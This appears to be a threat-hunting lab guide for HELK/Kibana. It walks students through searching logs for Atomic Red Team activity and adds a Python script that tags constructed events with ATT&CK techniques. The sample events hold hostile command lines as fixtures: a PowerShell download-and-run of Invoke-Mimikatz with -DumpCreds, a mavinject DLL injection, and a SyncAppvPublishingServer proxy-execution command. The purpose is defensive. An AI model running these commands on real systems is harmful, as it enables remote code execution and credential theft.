Using the threat optics built in the lab and the knowledge gained so far, hunt for the Atomic Red Team (ART) techniques executed in L1200-red.
Investigate the Atomic Red Team framework: a widely used, open-source library of small scripted tests for adversary emulation, each mapped to a MITRE ATT&CK technique.
Hunt for Indicators of Compromise related to those simulated attacks using the optics and knowledge gained during the prior exercises.
Kick off the hunt in Kibana!
Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.
Using Chrome or Internet Explorer on the Member Server, browse to the Kibana URL and log in with the credentials below.
URL: https://10.10.98.20
Username: helk
Password: hunting
Next, search the Kibana UI for the SyncAppvPublishingServer name found in the technique’s atomic YAML file:
syncappvpublishingserver
Add table columns as you find useful and review the resulting events.
A search for one of the DLLs referenced in the technique’s YAML file (t1218-2.dll) should surface the DLL injection test along with other evidence that can be correlated with it:
t1218-2.dll
Continue to the next portion of this lab.
Continue to operate from the PowerShell session opened in the previous lab section. From the Kibana interface, search for mimikatz and refresh; the time window and refresh settings may need to be widened. Review the results as in the previous labs by opening the individual documents and adding the fields of interest to the table.
mimikatz
Switch the log index to elastalert-status-*.
elastalert-status-*
From the ElastAlert view, the recent attack should be mapped to a matching MITRE technique.
This attack may also match the “Nishang-PowerShell-Commandlets” rule.
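The three Kibana searches used in this lab (syncappvpublishingserver, t1218-2.dll and mimikatz) and the ElastAlert-style technique tagging, reproduced below as an offline Python script over constructed Sysmon/PowerShell-style events. This is an added example and is not part of the lab, HELK or ElastAlert: the sample events, field names, host name, PIDs and the injector process name are constructed, and the IOC-to-technique mapping (T1218 for the two SyncAppv/DLL indicators, T1003 for Mimikatz) is an assumption chosen for the illustration. The substring match over every string field mirrors what the Kibana search bar does, and es_query builds the equivalent Elasticsearch query_string request with the widened time window.

```python
"""Offline reproduction of the lab's Kibana hunts and ElastAlert-style tagging.

Added example, not part of the lab or of HELK/ElastAlert. Events, field names,
host, PIDs and injector name are constructed; the IOC -> ATT&CK mapping is an
assumption made for this illustration.
"""
import json
from typing import Any, Dict, Iterator, List, Tuple

# Constructed Winlogbeat/Sysmon-style documents (real HELK index fields differ).
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {  # Sysmon EID 1: SyncAppvPublishingServer.vbs spawning PowerShell (assumed shape)
        "@timestamp": "2024-01-01T10:00:01Z", "event_id": 1, "host": {"name": "WS01"},
        "process": {
            "name": "powershell.exe",
            "command_line": "powershell.exe -Command Start-Process calc.exe",
            "parent": {
                "name": "wscript.exe",
                "command_line": 'wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs "n; Start-Process calc.exe"',
            },
        },
    },
    {  # Sysmon EID 1: DLL injection test loading the T1218 payload (injector name assumed)
        "@timestamp": "2024-01-01T10:00:07Z", "event_id": 1, "host": {"name": "WS01"},
        "process": {
            "name": "mavinject.exe",
            "command_line": "mavinject.exe 4132 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1218\\src\\x64\\T1218-2.dll",
        },
    },
    {  # PowerShell EID 4104 script block (constructed; URL is a placeholder)
        "@timestamp": "2024-01-01T10:02:15Z", "event_id": 4104, "host": {"name": "WS01"},
        "powershell": {
            "script_block_text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
        },
    },
    {  # Benign noise: must not match any rule
        "@timestamp": "2024-01-01T10:02:20Z", "event_id": 1, "host": {"name": "WS01"},
        "process": {"name": "svchost.exe", "command_line": "svchost.exe -k netsvcs -p"},
    },
]

# (search term, ATT&CK technique, rule name). Technique IDs are an assumption.
IOC_RULES: List[Tuple[str, str, str]] = [
    ("syncappvpublishingserver", "T1218", "SyncAppvPublishingServer proxy execution"),
    ("t1218-2.dll", "T1218", "T1218 atomic DLL injection payload"),
    ("mimikatz", "T1003", "Mimikatz credential dumping"),
]


def flatten(doc: Dict[str, Any], prefix: str = "") -> Iterator[Tuple[str, Any]]:
    """Yield (dotted.field.path, value) pairs for a nested JSON document."""
    for key, value in doc.items():
        path = f"{prefix}.{key}" if prefix else key
        if isinstance(value, dict):
            yield from flatten(value, path)
        else:
            yield path, value


def hunt(events: List[Dict[str, Any]], rules=IOC_RULES) -> List[Dict[str, Any]]:
    """Case-insensitive substring search over every string field, like the Kibana search bar.

    Returns one hit per (event, field, rule) so the analyst sees which field carried the IOC.
    """
    hits = []
    for event in events:
        for field, value in flatten(event):
            if not isinstance(value, str):
                continue
            for term, technique, rule in rules:
                if term in value.lower():
                    hits.append({
                        "timestamp": event["@timestamp"], "event_id": event["event_id"],
                        "host": event["host"]["name"], "field": field,
                        "term": term, "technique": technique, "rule": rule,
                    })
    return hits


def technique_summary(hits: List[Dict[str, Any]]) -> Dict[str, int]:
    """Count hits per ATT&CK technique, the way the ElastAlert view groups them."""
    summary: Dict[str, int] = {}
    for hit in hits:
        summary[hit["technique"]] = summary.get(hit["technique"], 0) + 1
    return summary


def es_query(term: str, hours_back: int = 24) -> Dict[str, Any]:
    """Elasticsearch request equivalent to the Kibana free-text search for `term`,
    with the time window widened to the last `hours_back` hours."""
    return {
        "query": {"bool": {
            "must": [{"query_string": {"query": term}}],
            "filter": [{"range": {"@timestamp": {"gte": f"now-{hours_back}h", "lte": "now"}}}],
        }},
        "sort": [{"@timestamp": "desc"}],
    }


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for hit in found:
        print(json.dumps(hit))
    print(json.dumps(technique_summary(found)))
    print(json.dumps(es_query("mimikatz", hours_back=48)))
```

The request returned by es_query can be POSTed to the _search endpoint of the HELK Elasticsearch index when the Kibana UI is not convenient; the endpoint address and index pattern are not given in this lab and would need to be taken from the HELK deployment.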
Continue hunting in the next section of the lab.
Continue from the previous lab section: expand the document and toggle the fields of interest into the table columns.
Collapse the document and review the ElastAlert view again. The sorted view should now include the MITRE technique mappings.
Explore the MITRE ATT&CK map (https://attack.mitre.org/) and test any technique of interest.
You have completed this lab.